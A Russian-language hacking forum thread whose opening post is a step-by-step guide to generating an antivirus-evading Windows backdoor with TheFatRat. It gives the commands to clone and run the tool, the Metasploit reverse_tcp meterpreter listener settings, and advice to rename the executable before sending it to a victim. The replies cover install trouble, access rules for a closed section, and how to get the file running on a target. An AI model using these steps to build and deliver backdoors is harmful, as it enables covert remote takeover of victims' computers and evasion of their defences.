Статья The Fat Rat Backdoor. 100% эксплоит (не детектится антивирусами)

Общий Салам!
Хочу Вас познакомить с одним замечательным генератором TheFatRat.

Шаг 1. Устанавливаем git
sudo apt-get install git
Шаг 2. Клонируем исходники генератора
git clone https://github.com/Screetsec/TheFatRat.git
Шаг 3. Переходим в cd TehFatrat/Setup, даем права на выполнение chmod +x setup.sh и наконец запускаем инсталятор ./setup.sh
Шаг 4. После установки всех зависемостей нужно обратно перейти в директорию TheFatrat и дать права на исполнение двум файлам для этого введите:
chmod +x fatrat и chmod +x powerfull.sh

Шаг 5. Запускаем генератор для этого введите ./fatrat
Шаг 6. Выбираем второй пункт в меню ([02] CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL)
Шаг 7. Вводим наш ip адрес (адрес машины с которого производим атаку) (в моем случае set lhost: 192.168.1.100)
Шаг 8. Вводим порт прослушивания (в моем случае set lport: 5555)
Теперь ждем пока сгенерируется наш shell code :) (После того как сгенерируется шелл код, окно автоматически закроется)
Идем в директорию TheFatrat/output и видим там Powerfull.exe (этот экзешник можно переименовать как вам вздумается)
Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют)))
Перед отправкой на VirusTotal прочти здесь !
Шаг 10. Запускаем msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 5555
exploit

Шаг 11. Запускаем экзешник на машине жертвы и вуаля meterpreter сессия получена!!!

P.S Прошу строго не судить я тут у вас впервые и заранее извиняюсь за отсутствие картинок и за оформление.
 

IF_ELSE

Green Team
20.01.2017
24
8
BIT
0
Уважаемые форумчане, столкнулся с проблемой при установке ФатРат, не получается установить пакет monodevelop, скрин ниже. Подскажите как его победить
 

Вложения

  • ghghghghgh.jpg
    ghghghghgh.jpg
    37,6 КБ · Просмотры: 203

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Ставим руками, в чем проблема.


[doublepost=1498741803,1498741707][/doublepost]Или тут пакет слей
 
  • Нравится
Реакции: ghost и id2746

Bringer_the_Light

Green Team
02.03.2017
109
127
BIT
0
Приветствую всех Уважаемых Мемберов,прочитав статью и отзывы о создании закрытого раздела для людей понимающих и стремящихся познать тонкости пентестинга вполне разделяю и понимаю недоброжелательные отзывы в сторону тех,кто убивает какие то "темы" на корню,хотя я сам являюсь нубом еще во многих вопросах.Пришла идея такого плана;почему бы и не сокрыть для подобных тем раздел с возможностью попасть туда по средством припровождения на данном форуме какое то время(это первое),ну и как за идею вполне возможно реализация каких то тестов?!Допустим я хочу получить доступ к этому разделу,но у меня нет на это прав,я нахожу на борде мембера,который имеет доступ,пишу ему,а он тестит мои навыки по средством каких либо тестов или открытых спец.бордов,где я своими навыками прохожу эти тесты/тест или не прохожу и в результате либо мне дают добро,либо продолжаю набираться навыков которых не хватает для того,чтобы его получить.Конечно это не избавит от проблемы "человеческого фактора",но вполне может хоть не много отсеять "школотронов".
Прошу сильно не ругать и не сочтите за флуд,мне очень нравится сей борд и люди вполне себе адекватные и хотелось бы чтобы он развивался и мы вместе с ним,всем спасибо.
 
A

Alex.Nov

Boggy, думаю не стоит так категорично. Я новый человек на форуме, пришел суда именно за знаниями, и могу не пройти эти самые тесты. Закрытый раздел поддерживаю полностью, но хочется сразу разобраться как к нему получить доступ. ТС не понимаю, я только начал читать про проверку на VT и подумалось зачем?? Это же чистый слив? Прочитав комменты уже узнал нужную ссылку чтоб ьакого не повторить. Ну и никто не мешает людям тем кто уже прошел тест сливать все.
Вот система инвайтов может себя оправдать. Но опять же, я новый человек никого не знаю, никто не знает меня у кого просить инвайт?
 
  • Нравится
Реакции: Vertigo

wooolff

Green Team
19.02.2017
233
36
BIT
0
Все таки не могу понять, как именно залить файл и как именно запустить на машине?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!